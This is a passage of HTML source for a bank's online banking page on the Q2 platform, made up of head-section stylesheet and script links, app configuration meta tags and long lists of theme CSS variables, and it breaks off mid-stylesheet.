<html
  class="js flexbox fontface objectfit object-fit csspositionsticky cssreflections no-regions cssresize shapes siblinggeneral subpixelfont supports csstransforms3d preserve3d canvas canvastext emoji devicemotion deviceorientation svg svgasimg svgclippaths svgfilters svgforeignobject inlinesvg smil no-touchevents typedarrays uagent-chrome uagent-webkit uagent-osWindows theme-q2_nlp flexbox fontface objectfit object-fit csspositionsticky cssreflections no-regions cssresize shapes siblinggeneral subpixelfont supports csstransforms3d preserve3d canvas canvastext emoji devicemotion deviceorientation svg svgasimg svgclippaths svgfilters svgforeignobject inlinesvg smil touchevents typedarrays uagent-safari uagent-osOsx uagent-mobile uagent-mobileIos uagent-mobileIosIphone"
  lang="en"
  style="
    background-image: url('https://cdn1.onlineaccess1.com/cdn/depot/3199/3180/3ad51d112e07b0f4d55d826341a90380/assets/images/desktop-background-new-47bf929bb0e62855db71926f7b3bf515.jpg');
  "
  stencil-hydrated=""
>
  <!--<![endif]-->

  <head id="pageheader">
    <link
      rel="stylesheet"
      href="https://cdn1.onlineaccess1.com/cdn/base/tecton/v1.27.1/q2-tecton-theme.css"
      id="tecton-default-theme"
    />
    <link
      rel="stylesheet"
      href="https://cdn1.onlineaccess1.com/cdn/base/tecton/v1.27.1/q2-tecton-utilities.css"
      id="tecton-utilities"
    />
    <link
      href="https://cdn1.onlineaccess1.com/cdn/base/4.5.2.4B/assets/app.css"
      rel="stylesheet"
      data-no-shim=""
    />
    <link
      href="https://cdn1.onlineaccess1.com/cdn/depot/3199/3180/3ad51d112e07b0f4d55d826341a90380/assets/highcontrast-dac8ab916499f255bb4b17cc329800b8.css"
      rel="stylesheet"
      data-no-shim=""
    />
    <link
      href="https://cdn1.onlineaccess1.com/cdn/base/4.5.2.4B/assets/base.css"
      rel="stylesheet"
      data-no-shim=""
    />
    <link
      href="https://cdn1.onlineaccess1.com/cdn/depot/3199/3180/3ad51d112e07b0f4d55d826341a90380/assets/theme-q2_nlp-011cf312b114fb5e491846003fee4760.css"
      rel="stylesheet"
      data-no-shim=""
    />
    <link
      href="https://cdn1.onlineaccess1.com/cdn/depot/3199/3180/3ad51d112e07b0f4d55d826341a90380/assets/images/favicon-766722f45934212d3e07722123552a3a.ico"
      rel="icon"
    />

    <title>Camden National Bank</title>
    <meta charset="utf-8" />
    <style data-styles="">
      q2-icon,
      q2-select,
      q2-action-sheet,
      q2-calendar,
      q2-dropdown,
      q2-editable-field,
      q2-pagination,
      q2-pill,
      q2-tab-container,
      q2-tag,
      q2-carousel,
      q2-month-picker,
      q2-section,
      q2-stepper,
      q2-card,
      q2-chart-donut,
      q2-checkbox,
      q2-checkbox-group,
      q2-radio-group,
      q2-stepper-vertical,
      q2-textarea,
      q2-carousel-pane,
      q2-chart-area,
      q2-chart-bar,
      q2-loading-element,
      q2-loc,
      q2-radio,
      q2-stepper-pane,
      q2-tab-pane,
      q2-tooltip,
      tecton-tab-pane,
      q2-dropdown-item,
      q2-avatar,
      q2-option,
      q2-optgroup,
      q2-message,
      click-elsewhere,
      q2-popover,
      q2-option-list,
      q2-btn,
      q2-loading,
      q2-input,
      q2-badge {
        visibility: hidden;
      }

      [stencil-hydrated] {
        visibility: inherit;
      }
    </style>
    <style data-styles="">
      q2-icon,
      q2-select,
      q2-action-sheet,
      q2-calendar,
      q2-dropdown,
      q2-editable-field,
      q2-pagination,
      q2-pill,
      q2-tab-container,
      q2-tag,
      q2-carousel,
      q2-month-picker,
      q2-section,
      q2-stepper,
      q2-card,
      q2-chart-donut,
      q2-checkbox,
      q2-checkbox-group,
      q2-radio-group,
      q2-stepper-vertical,
      q2-textarea,
      q2-carousel-pane,
      q2-chart-area,
      q2-chart-bar,
      q2-loading-element,
      q2-loc,
      q2-radio,
      q2-stepper-pane,
      q2-tab-pane,
      q2-tooltip,
      tecton-tab-pane,
      q2-dropdown-item,
      q2-avatar,
      q2-option,
      q2-optgroup,
      q2-message,
      click-elsewhere,
      q2-popover,
      q2-option-list,
      q2-btn,
      q2-loading,
      q2-input,
      q2-badge {
        visibility: hidden;
      }

      [stencil-hydrated] {
        visibility: inherit;
      }
    </style>
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="description" />
    <meta name="author" />
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta
      name="format-detection"
      content="telephone=no, address=no, email=no"
    />
    <meta
      id="viewportMeta"
      name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=0, user-scalable=no, viewport-fit=cover"
    />

    <meta name="referrer" content="origin" />

    <script
      src="https://cdn1.onlineaccess1.com/cdn/base/4.5.2.4B/assets/add-engine-meta.js"
      type="text/javascript"
    ></script>
    <meta
      name="q2-app/config/asset-manifest"
      content="%7B%22bundles%22:%7B%22q2-commercial-engine%22:%7B%22assets%22:%5B%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.5.2.4B/assets/engines-dist/q2-commercial-engine/assets/engine-vendor.css%22,%22type%22:%22css%22%7D,%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.5.2.4B/assets/engines-dist/q2-commercial-engine/assets/engine-vendor.js%22,%22type%22:%22js%22%7D,%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.5.2.4B/assets/engines-dist/q2-commercial-engine/assets/engine.js%22,%22type%22:%22js%22%7D%5D%7D,%22q2-report-engine%22:%7B%22assets%22:%5B%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.5.2.4B/assets/engines-dist/q2-report-engine/assets/engine-vendor.css%22,%22type%22:%22css%22%7D,%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.5.2.4B/assets/engines-dist/q2-report-engine/assets/engine-vendor.js%22,%22type%22:%22js%22%7D,%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.5.2.4B/assets/engines-dist/q2-report-engine/assets/engine.js%22,%22type%22:%22js%22%7D%5D%7D%7D%7D"
    />
    <meta
      name="q2-commercial-engine/config/environment"
      content="%7B%22modulePrefix%22:%22q2-commercial-engine%22,%22rootURL%22:%22/%22,%22wsURL%22:%22mobilews/%22,%22locationType%22:%22hash%22,%22EmberENV%22:%7B%22contentSecurityPolicy%22:%7B%22default-src%22:%22'none'%22,%22script-src%22:%22'self'%20'unsafe-inline'%20'unsafe-eval'%20maps.googleapis.com%20maps.gstatic.com%22,%22connect-src%22:%22'self'%22,%22img-src%22:%22'self'%20data:%20hud.gov%22,%22style-src%22:%22'self'%20'unsafe-inline'%20use.typekit.net%22%7D%7D,%22baseURL%22:%22/%22,%22APP%22:%7B%22name%22:%22dummy%22%7D,%22contentSecurityPolicy%22:%7B%22default-src%22:%22'none'%22,%22script-src%22:%22'self'%22,%22font-src%22:%22'self',%20'https://fonts.gstatic.com'%22,%22connect-src%22:%22'self'%22,%22img-src%22:%22'self'%20www.gravatar.com%22,%22style-src%22:%22'self'%20'https://fonts.gstatic.com'%22,%22media-src%22:%22'self'%22%7D,%22exportApplicationGlobal%22:true%7D"
    />
    <meta
      name="q2-report-engine/config/environment"
      content="%7B%22modulePrefix%22:%22q2-report-engine%22,%22rootURL%22:%22/%22,%22wsURL%22:%22mobilews/%22,%22locationType%22:%22hash%22,%22EmberENV%22:%7B%22contentSecurityPolicy%22:%7B%22default-src%22:%22'none'%22,%22script-src%22:%22'self'%20'unsafe-inline'%20'unsafe-eval'%20maps.googleapis.com%20maps.gstatic.com%22,%22connect-src%22:%22'self'%22,%22img-src%22:%22'self'%20data:%20hud.gov%22,%22style-src%22:%22'self'%20'unsafe-inline'%20use.typekit.net%22%7D%7D,%22exportApplicationGlobal%22:true,%22APP%22:%7B%7D%7D"
    />
    <meta
      name="q2-app/config/asset-manifest"
      content="%7B%22bundles%22:%7B%22q2-commercial-engine%22:%7B%22assets%22:%5B%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.5.2.4B/assets/engines-dist/q2-commercial-engine/assets/engine-vendor.css%22,%22type%22:%22css%22%7D,%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.5.2.4B/assets/engines-dist/q2-commercial-engine/assets/engine-vendor.js%22,%22type%22:%22js%22%7D,%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.5.2.4B/assets/engines-dist/q2-commercial-engine/assets/engine.js%22,%22type%22:%22js%22%7D%5D%7D,%22q2-report-engine%22:%7B%22assets%22:%5B%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.5.2.4B/assets/engines-dist/q2-report-engine/assets/engine-vendor.css%22,%22type%22:%22css%22%7D,%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.5.2.4B/assets/engines-dist/q2-report-engine/assets/engine-vendor.js%22,%22type%22:%22js%22%7D,%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.5.2.4B/assets/engines-dist/q2-report-engine/assets/engine.js%22,%22type%22:%22js%22%7D%5D%7D%7D%7D"
    />
    <meta
      name="q2-commercial-engine/config/environment"
      content="%7B%22modulePrefix%22:%22q2-commercial-engine%22,%22rootURL%22:%22/%22,%22wsURL%22:%22mobilews/%22,%22locationType%22:%22hash%22,%22EmberENV%22:%7B%22contentSecurityPolicy%22:%7B%22default-src%22:%22'none'%22,%22script-src%22:%22'self'%20'unsafe-inline'%20'unsafe-eval'%20maps.googleapis.com%20maps.gstatic.com%22,%22connect-src%22:%22'self'%22,%22img-src%22:%22'self'%20data:%20hud.gov%22,%22style-src%22:%22'self'%20'unsafe-inline'%20use.typekit.net%22%7D%7D,%22baseURL%22:%22/%22,%22APP%22:%7B%22name%22:%22dummy%22%7D,%22contentSecurityPolicy%22:%7B%22default-src%22:%22'none'%22,%22script-src%22:%22'self'%22,%22font-src%22:%22'self',%20'https://fonts.gstatic.com'%22,%22connect-src%22:%22'self'%22,%22img-src%22:%22'self'%20www.gravatar.com%22,%22style-src%22:%22'self'%20'https://fonts.gstatic.com'%22,%22media-src%22:%22'self'%22%7D,%22exportApplicationGlobal%22:true%7D"
    />
    <meta
      name="q2-report-engine/config/environment"
      content="%7B%22modulePrefix%22:%22q2-report-engine%22,%22rootURL%22:%22/%22,%22wsURL%22:%22mobilews/%22,%22locationType%22:%22hash%22,%22EmberENV%22:%7B%22contentSecurityPolicy%22:%7B%22default-src%22:%22'none'%22,%22script-src%22:%22'self'%20'unsafe-inline'%20'unsafe-eval'%20maps.googleapis.com%20maps.gstatic.com%22,%22connect-src%22:%22'self'%22,%22img-src%22:%22'self'%20data:%20hud.gov%22,%22style-src%22:%22'self'%20'unsafe-inline'%20use.typekit.net%22%7D%7D,%22exportApplicationGlobal%22:true,%22APP%22:%7B%7D%7D"
    />
    <script
      src="https://cdn1.onlineaccess1.com/cdn/base/4.5.2.4B/assets/vendorapp.js"
      type="text/javascript"
    ></script>
    <style type="text/css">
      span.im-caret {
        -webkit-animation: 1s blink step-end infinite;
        animation: 1s blink step-end infinite;
      }

      @keyframes blink {
        from,
        to {
          border-right-color: black;
        }

        50% {
          border-right-color: transparent;
        }
      }

      @-webkit-keyframes blink {
        from,
        to {
          border-right-color: black;
        }

        50% {
          border-right-color: transparent;
        }
      }

      span.im-static {
        color: grey;
      }

      div.im-colormask {
        display: inline-block;
        border-style: inset;
        border-width: 2px;
        -webkit-appearance: textfield;
        -moz-appearance: textfield;
        appearance: textfield;
      }

      div.im-colormask > input {
        position: absolute;
        display: inline-block;
        background-color: transparent;
        color: transparent;
        -webkit-appearance: caret;
        -moz-appearance: caret;
        appearance: caret;
        border-style: none;
        left: 0;
        /*calculated*/
      }

      div.im-colormask > input:focus {
        outline: none;
      }

      div.im-colormask > input::-moz-selection {
        background: none;
      }

      div.im-colormask > input::selection {
        background: none;
      }

      div.im-colormask > input::-moz-selection {
        background: none;
      }

      div.im-colormask > div {
        color: black;
        display: inline-block;
        width: 100px;
        /*calculated*/
      }
    </style>
    <style type="text/css">
      span.im-caret {
        -webkit-animation: 1s blink step-end infinite;
        animation: 1s blink step-end infinite;
      }

      @keyframes blink {
        from,
        to {
          border-right-color: black;
        }

        50% {
          border-right-color: transparent;
        }
      }

      @-webkit-keyframes blink {
        from,
        to {
          border-right-color: black;
        }

        50% {
          border-right-color: transparent;
        }
      }

      span.im-static {
        color: grey;
      }

      div.im-colormask {
        display: inline-block;
        border-style: inset;
        border-width: 2px;
        -webkit-appearance: textfield;
        -moz-appearance: textfield;
        appearance: textfield;
      }

      div.im-colormask > input {
        position: absolute;
        display: inline-block;
        background-color: transparent;
        color: transparent;
        -webkit-appearance: caret;
        -moz-appearance: caret;
        appearance: caret;
        border-style: none;
        left: 0;
        /*calculated*/
      }

      div.im-colormask > input:focus {
        outline: none;
      }

      div.im-colormask > input::-moz-selection {
        background: none;
      }

      div.im-colormask > input::selection {
        background: none;
      }

      div.im-colormask > input::-moz-selection {
        background: none;
      }

      div.im-colormask > div {
        color: black;
        display: inline-block;
        width: 100px;
        /*calculated*/
      }
    </style>
    <script
      src="https://cdn1.onlineaccess1.com/cdn/depot/3199/3180/3ad51d112e07b0f4d55d826341a90380/assets/themejs/theme-q2_nlp-a209dc89dee2e82dde5a867b76716ad7.js"
      type="text/javascript"
    ></script>
    <script
      src="https://cdn1.onlineaccess1.com/cdn/depot/3199/3180/3ad51d112e07b0f4d55d826341a90380/assets/resources/en-us-d9401eac564ef0dc3d1da29eab6a3ec7.js"
      type="text/javascript"
    ></script>
    <link
      href="https://cdn1.onlineaccess1.com/cdn/base/4.5.2.4B/assets/tecton-7617a2cf88a1105517d83f421356f88c.css"
      rel="stylesheet"
    />
    <style id="tecton-props-css">
      :root {
        --tct-stoplight-info: #0079c1;
        --tct-stoplight-success: #0e8a00;
        --tct-stoplight-warning: #f0b400;
        --tct-stoplight-alert: #c30000;
        --tct-global-focus: 0 0 0 2px #33b4ff;
        --tct-black: #000000;
        --tct-gray-d3: #222222;
        --tct-gray-d2: #444444;
        --tct-gray-d1: #666666;
        --tct-gray: #999999;
        --tct-gray-l1: #cccccc;
        --tct-gray-l2: #eeeeee;
        --tct-gray-l3: #f2f2f2;
        --tct-white: #ffffff;
        --tct-disabled-opacity: 0.66;
        --tct-border-radius-1: 3px;
        --tct-border-radius-2: 6px;
        --tct-border-radius-3: 12px;
        --tct-shadow-1: 0 2px 4px rgba(0, 0, 0, 0.3);
        --tct-shadow-2: 0 3px 6px rgba(0, 0, 0, 0.3);
        --tct-shadow-3: 0 4px 12px rgba(0, 0, 0, 0.3);
        --tct-duration-1: 0.2s;
        --tct-duration-2: 0.4s;
        --tct-duration-3: 0.8s;
        --tct-tween-1: 0.2s ease;
        --tct-tween-2: 0.4s ease;
        --tct-tween-3: 0.8s ease;
        --const-stoplight-info: #0079c1;
        --const-stoplight-success: #0e8a00;
        --const-stoplight-warning: #f0b400;
        --const-stoplight-alert: #c30000;
        --const-global-focus: 0 0 0 2px #33b4ff;
        --const-stoplight-info-text: #ffffff;
        --const-stoplight-success-text: #ffffff;
        --const-stoplight-warning-text: #000000;
        --const-stoplight-alert-text: #ffffff;
        --app-black: #000000;
        --app-gray-d3: #222222;
        --app-gray-d2: #444444;
        --app-gray-d1: #666666;
        --app-gray: #999999;
        --app-gray-l1: #cccccc;
        --app-gray-l2: #eeeeee;
        --app-gray-l3: #f2f2f2;
        --app-white: #ffffff;
        --app-disabled-opacity: 0.66;
        --app-border-radius-1: 3px;
        --app-border-radius-2: 6px;
        --app-border-radius-3: 12px;
        --app-shadow-1: 0 2px 4px rgba(0, 0, 0, 0.3);
        --app-shadow-2: 0 3px 6px rgba(0, 0, 0, 0.3);
        --app-shadow-3: 0 4px 12px rgba(0, 0, 0, 0.3);
        --app-duration-1: 0.2s;
        --app-duration-2: 0.4s;
        --app-duration-3: 0.8s;
        --app-tween-1: 0.2s ease;
        --app-tween-2: 0.4s ease;
        --app-tween-3: 0.8s ease;
        --app-font-size: 14px;
        --app-line-height: 1.428571429;
        --app-font-size-small: 12px;
        --app-tooltip-multiline-max-width: 200px;
        --app-tooltip-background-color: rgba(0, 0, 0, 0.8);
        --app-tooltip-text-color: #ffffff;
        --app-tooltip-size: 5px;
        --app-tooltip-position: -5px;
        --app-tooltip-body-offset: -15px;
        --app-tooltip-transition-duration: 250ms;
        --app-tooltip-visible-duration: 2s;
      }
    </style>
    <style id="tecton-theme-css">
      :root {
        --tct-scale-0: 0px;
        --tct-scale-1: 5px;
        --tct-scale-2: 10px;
        --tct-scale-3: 15px;
        --tct-scale-4: 20px;
        --tct-scale-5: 45px;
        --tct-scale-6: 60px;
        --tct-scale-0x: 0px;
        --tct-scale-1x: 5px;
        --tct-scale-2x: 10px;
        --tct-scale-3x: 15px;
        --tct-scale-4x: 20px;
        --tct-scale-5x: 25px;
        --tct-scale-6x: 30px;
        --tct-scale-7x: 35px;
        --tct-scale-8x: 40px;
        --tct-scale-9x: 45px;
        --tct-scale-10x: 50px;
        --tct-scale-11x: 55px;
        --tct-scale-12x: 60px;
        --tct-link-color: #0096db;
        --tct-link-hover-color: #005a83;
        --tct-btn-disabled-opacity: 0.66;
        --tct-btn-padding: 10px;
        --tct-btn-font-size: inherit;
        --tct-btn-tween: 0.2s ease;
        --tct-btn-primary-bg: #005587;
        --tct-btn-primary-font-color: #ffffff;
        --tct-btn-primary-font-weight: 600;
        --tct-btn-primary-text-transform: none;
        --tct-btn-primary-letter-spacing: normal;
        --tct-btn-primary-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12),
          0 1px 2px rgba(0, 0, 0, 0.24);
        --tct-btn-primary-border-color: transparent;
        --tct-btn-primary-border-width: 0;
        --tct-btn-primary-border-radius: 3px;
        --tct-btn-primary-hover-bg: #0096db;
        --tct-btn-primary-hover-font-color: #ffffff;
        --tct-btn-primary-hover-border-color: transparent;
        --tct-btn-primary-hover-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.19),
          0 3px 3px rgba(0, 0, 0, 0.23);
        --tct-btn-primary-disabled-bg: #005587;
        --tct-btn-primary-disabled-font-color: #ffffff;
        --tct-btn-primary-disabled-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12),
          0 1px 2px rgba(0, 0, 0, 0.24);
        --tct-btn-secondary-bg: #005587;
        --tct-btn-secondary-font-color: #ffffff;
        --tct-btn-secondary-font-weight: 600;
        --tct-btn-secondary-text-transform: none;
        --tct-btn-secondary-letter-spacing: normal;
        --tct-btn-secondary-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12),
          0 1px 2px rgba(0, 0, 0, 0.24);
        --tct-btn-secondary-border-color: transparent;
        --tct-btn-secondary-border-width: 0;
        --tct-btn-secondary-border-radius: 3px;
        --tct-btn-secondary-hover-bg: #0096db;
        --tct-btn-secondary-hover-font-color: #ffffff;
        --tct-btn-secondary-hover-border-color: transparent;
        --tct-btn-secondary-hover-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.19),
          0 3px 3px rgba(0, 0, 0, 0.23);
        --tct-btn-secondary-disabled-bg: #005587;
        --tct-btn-secondary-disabled-font-color: #ffffff;
        --tct-btn-secondary-disabled-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12),
          0 1px 2px rgba(0, 0, 0, 0.24);
        --tct-btn-neutral-bg: #ffffff;
        --tct-btn-neutral-font-color: #0096db;
        --tct-btn-neutral-font-weight: 600;
        --tct-btn-neutral-text-transform: none;
        --tct-btn-neutral-letter-spacing: normal;
        --tct-btn-neutral-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12),
          0 1px 2px rgba(0, 0, 0, 0.24);
        --tct-btn-neutral-border-color: #0096db;
        --tct-btn-neutral-border-width: 1px;
        --tct-btn-neutral-border-radius: 3px;
        --tct-btn-neutral-hover-bg: #ffffff;
        --tct-btn-neutral-hover-font-color: #0096db;
        --tct-btn-neutral-hover-border-color: #0096db;
        --tct-btn-neutral-hover-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.19),
          0 3px 3px rgba(0, 0, 0, 0.23);
        --tct-btn-neutral-disabled-bg: #ffffff;
        --tct-btn-neutral-disabled-font-color: #0096db;
        --tct-btn-neutral-disabled-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12),
          0 1px 2px rgba(0, 0, 0, 0.24);
        --tct-btn-icon-width: 44px;
        --tct-btn-icon-height: 44px;
        --tct-btn-icon-color: inherit;
        --tct-btn-icon-hover-bg: #ebebeb;
        --tct-btn-icon-hover-color: #005a83;
        --tct-btn-badge-padding: 2px 5px;
        --tct-btn-badge-font-size: inherit;
        --tct-btn-badge-border-radius: 3px;
        --tct-btn-badge-bg: transparent;
        --tct-btn-badge-font-color: inherit;
        --tct-btn-badge-hover-bg: #f2f2f2;
        --tct-btn-badge-hover-font-color: #2e2e2e;
        --tct-btn-badge-active-bg: #005587;
        --tct-btn-badge-active-font-color: #ffffff;
        --tct-input-margin-top: 30px;
        --tct-input-margin-bottom: 30px;
        --tct-input-font-size: inherit;
        --tct-input-label-padding-left: 0;
        --tct-input-label-padding-right: 0;
        --tct-input-label-margin-bottom: 5px;
        --tct-input-label-font-color: #2e2e2e;
        --tct-input-error-label-font-color: #2e2e2e;
        --tct-input-label-font-size: inherit;
        --tct-input-label-font-weight: 600;
        --tct-input-label-letter-spacing: normal;
        --tct-input-label-text-transform: none;
        --tct-input-label-optional-margin-left: 5px;
        --tct-input-label-optional-font-color: #747474;
        --tct-input-label-optional-font-size: 12px;
        --tct-input-label-optional-font-weight: 400;
        --tct-input-height: 42px;
        --tct-input-horizontal-padding: 10px;
        --tct-input-bg: #fcfcfd;
        --tct-input-font-color: #2e2e2e;
        --tct-input-border-top-width: 1px;
        --tct-input-border-right-width: 1px;
        --tct-input-border-bottom-width: 1px;
        --tct-input-border-left-width: 1px;
        --tct-input-border-color: #949494;
        --tct-input-border-top-left-radius: 3px;
        --tct-input-border-top-right-radius: 3px;
        --tct-input-border-bottom-right-radius: 3px;
        --tct-input-border-bottom-left-radius: 3px;
        --tct-input-box-shadow: none;
        --tct-input-tween: 0.4s ease;
        --tct-input-disabled-opacity: 0.66;
        --tct-input-placeholder-font-color: #6c6c6c;
        --tct-input-focus-border-top-width: 1px;
        --tct-input-focus-border-right-width: 1px;
        --tct-input-focus-border-bottom-width: 1px;
        --tct-input-focus-border-left-width: 1px;
        --tct-input-focus-border-color: #0079c1;
        --tct-input-focus-box-shadow: 0 0 transparent;
        --tct-input-icon-stroke-primary: #999999;
        --tct-input-prefix-font-size: inherit;
        --tct-input-prefix-font-color: #2e2e2e;
        --tct-input-prefix-bg: #fcfcfd;
        --tct-input-prefix-border-color: #949494;
        --tct-input-error-prefix-font-color: #2e2e2e;
        --tct-input-error-prefix-bg: #fcfcfd;
        --tct-input-message-box-shadow: 0 2px 4px rgba(0, 0, 0, 0.3);
        --tct-input-message-tween: 0.2s ease;
        --tct-message-bg: #f2f2f2;
        --tct-tab-active-color: #0096db;
        --tct-tab-inactive-color: #2e2e2e;
        --tct-tab-font-size: 17px;
        --tct-tab-alt-active-color: inherit;
        --tct-tab-alt-inactive-color: inherit;
        /* -------------------------------------------------------------- */
        --app-scale-0: 0px;
        --app-scale-1: 5px;
        --app-scale-2: 10px;
        --app-scale-3: 15px;
        --app-scale-4: 20px;
        --app-scale-5: 45px;
        --app-scale-6: 60px;
        --app-scale-0x: 0px;
        --app-scale-1x: 5px;
        --app-scale-2x: 10px;
        --app-scale-3x: 15px;
        --app-scale-4x: 20px;
        --app-scale-5x: 25px;
        --app-scale-6x: 30px;
        --app-scale-7x: 35px;
        --app-scale-8x: 40px;
        --app-scale-9x: 45px;
        --app-scale-10x: 50px;
        --app-scale-11x: 55px;
        --app-scale-12x: 60px;
        --t-font-family: OpenSans, Helvetica Neue, Helvetica, Arial, sans-serif;
        --t-font-stretch: normal;
        --t-font-family-monospaced: Courier New, Courier, Lucida Sans Typewriter,
          Lucida Typewriter, monospace;
        --t-primary-d5: #004b6e;
        --t-primary-d4: #005a83;
        --t-primary-d3: #006999;
        --t-primary-d2: #0078af;
        --t-primary-d1: #0087c5;
        --t-primary: #0096db;
        --t-primary-l1: #00aaf8;
        --t-primary-l2: #16b6ff;
        --t-primary-l3: #33bfff;
        --t-primary-l4: #50c8ff;
        --t-primary-l5: #6ed1ff;
        --t-secondary-d5: #4d6773;
        --t-secondary-d4: #5c7b8a;
        --t-secondary-d3: #6e8f9e;
        --t-secondary-d2: #85a1ad;
        --t-secondary-d1: #9cb2bd;
        --t-secondary: #b3c4cc;
        --t-secondary-l1: #bacad1;
        --t-secondary-l2: #c2d0d6;
        --t-secondary-l3: #c9d6db;
        --t-secondary-l4: #d1dce0;
        --t-secondary-l5: #d9e1e6;
        --t-tertiary-d5: #1c9cd6;
        --t-tertiary-d4: #3db1e6;
        --t-tertiary-d3: #68c2eb;
        --t-tertiary-d2: #93d3f1;
        --t-tertiary-d1: #bee5f6;
        --t-tertiary: #e8f6fc;
        --t-tertiary-l1: #ebf7fc;
        --t-tertiary-l2: #edf8fd;
        --t-tertiary-l3: #eff9fd;
        --t-tertiary-l4: #f1fafd;
        --t-tertiary-l5: #f4fafe;
        --t-accent-1: #e05252;
        --t-accent-1-l1: #e77474;
        --t-accent-1-d1: #b62020;
        --t-accent-2: #e09952;
        --t-accent-2-l1: #e7ad74;
        --t-accent-2-d1: #b66b20;
        --t-accent-3: #e0e052;
        --t-accent-3-l1: #e7e774;
        --t-accent-3-d1: #b6b620;
        --t-accent-4: #99e052;
        --t-accent-4-l1: #ade774;
        --t-accent-4-d1: #6bb620;
        --t-accent-5: #52e052;
        --t-accent-5-l1: #74e774;
        --t-accent-5-d1: #20b620;
        --t-accent-6: #52e099;
        --t-accent-6-l1: #74e7ad;
        --t-accent-6-d1: #20b66b;
        --t-accent-7: #52e0e0;
        --t-accent-7-l1: #74e7e7;
        --t-accent-7-d1: #20b6b6;
        --t-accent-8: #5299e0;
        --t-accent-8-l1: #74ade7;
        --t-accent-8-d1: #206bb6;
        --t-accent-9: #5252e0;
        --t-accent-9-l1: #7474e7;
        --t-accent-9-d1: #2020b6;
        --t-accent-10: #9952e0;
        --t-accent-10-l1: #ad74e7;
        --t-accent-10-d1: #6b20b6;
        --t-accent-11: #e052e0;
        --t-accent-11-l1: #e774e7;
        --t-accent-11-d1: #b620b6;
        --t-accent-12: #e05299;
        --t-accent-12-l1: #e774ad;
        --t-accent-12-d1: #b6206b;
        --t-gray-1: #0d0d0d;
        --t-gray-2: #1a1a1a;
        --t-gray-3: #262626;
        --t-gray-4: #333333;
        --t-gray-5: #404040;
        --t-gray-6: #4d4d4d;
        --t-gray-7: #666666;
        --t-gray-8: gray;
        --t-gray-9: #999999;
        --t-gray-10: #b3b3b3;
        --t-gray-11: #cccccc;
        --t-gray-12: #d9d9d9;
        --t-gray-13: #e6e6e6;
        --t-gray-14: #f2f2f2;
        --t-text: #4d4d4d;
        --t-textA: rgba(77, 77, 77, 0.77);
        --t-primary-text: #ffffff;
        --t-secondary-text: #141414;
        --t-tertiary-text: #141414;
        --t-base: #ffffff;
        --t-base-a0: rgba(255, 255, 255, 0);
        --t-base-a1: rgba(255, 255, 255, 0.25);
        --t-base-a2: rgba(255, 255, 255, 0.5);
        --t-base-a3: rgba(255, 255, 255, 0.75);
        --t-top: #0d0d0d;
        --t-top-a0: rgba(13, 13, 13, 0);
        --t-top-a1: rgba(13, 13, 13, 0.35);
        --t-top-a2: rgba(13, 13, 13, 0.6);
        --t-top-a3: rgba(13, 13, 13, 0.85);
        --t-box-shadow-1: 0 2px 4px rgba(13, 13, 13, 0.35);
        --t-box-shadow-2: 0 3px 6px rgba(13, 13, 13, 0.35);
        --t-box-shadow-3: 0 4px 12px rgba(13, 13, 13, 0.35);
        --t-border-radius-1: 3px;
        --t-border-radius-2: 6px;
        --t-border-radius-3: 12px;
        --t-focus: #33b4ff;
        --t-status-info: #0079c1;
        --t-status-alert: #c30000;
        --t-status-warn: #f0b400;
        --t-status-success: #0e8a00;
        --t-tab-inactive: #2e2e2e;
        --t-tab-active: #0096db;
        --t-tab-alt-inactive: inherit;
        --t-tab-alt-active: inherit;
        --t-tab-font-size: 17px;
        --t-highlight-1: #0096db;
        --t-highlight-2: #005587;
        --t-highlight-3: #a4d65e;
        --t-highlight-4: #00bab3;
        --t-highlight-5: #dfd1a7;
        --t-highlight-6: #8c8279;
        --t-highlight-7: #40b0e4;
        --t-highlight-8: #4080a5;
        --t-highlight-9: #bbe086;
        --t-highlight-10: #40cbc6;
        --t-highlight-11: #a9a19b;
        --t-highlight-12: #0096db;
        --t-highlight-13: #005587;
        --t-highlight-14: #a4d65e;
        --t-highlight-15: #00bab3;
        --t-input-outline: 1px solid #0096db;
        --t-icon-stroke-width: 1.5;
        --t-icon-cap: round;
        --t-icon-stroke-primary: currentColor;
        --t-icon-stroke-secondary: currentColor;
        --t-icon-fill: none;
        --t-font-color: #2e2e2e;
        --t-a11y-gray-color: #747474;
        --t-a11y-gray-color-AA: #949494;
        --t-a11y-active-gray-color-AA: #404040;
        --t-link-color: #0096db;
        --t-link-hover-color: #005a83;
        --t-content-bg: #ffffff;
        --t-content-border-color: #cccccc;
        --t-content-font-color: #2e2e2e;
        --t-section-bg: #ffffff;
        --t-section-font-color: #2e2e2e;
        --t-section-border-radius: 3px;
        --t-button-default-bg: #005587;
        --t-button-default-font-color: #ffffff;
        --t-button-default-hover-bg: #0096db;
        --t-button-default-hover-font-color: #ffffff;
        --t-button-primary-bg: #005587;
        --t-button-primary-font-color: #ffffff;
        --t-button-primary-hover-bg: #0096db;
        --t-button-primary-hover-font-color: #ffffff;
        --t-input-font-color: #2e2e2e;
        --t-input-placeholder-font-color: #6c6c6c;
        --t-input-bg: #fcfcfd;
        --t-input-border-color: #949494;
        --t-input-focus-font-color: #2e2e2e;
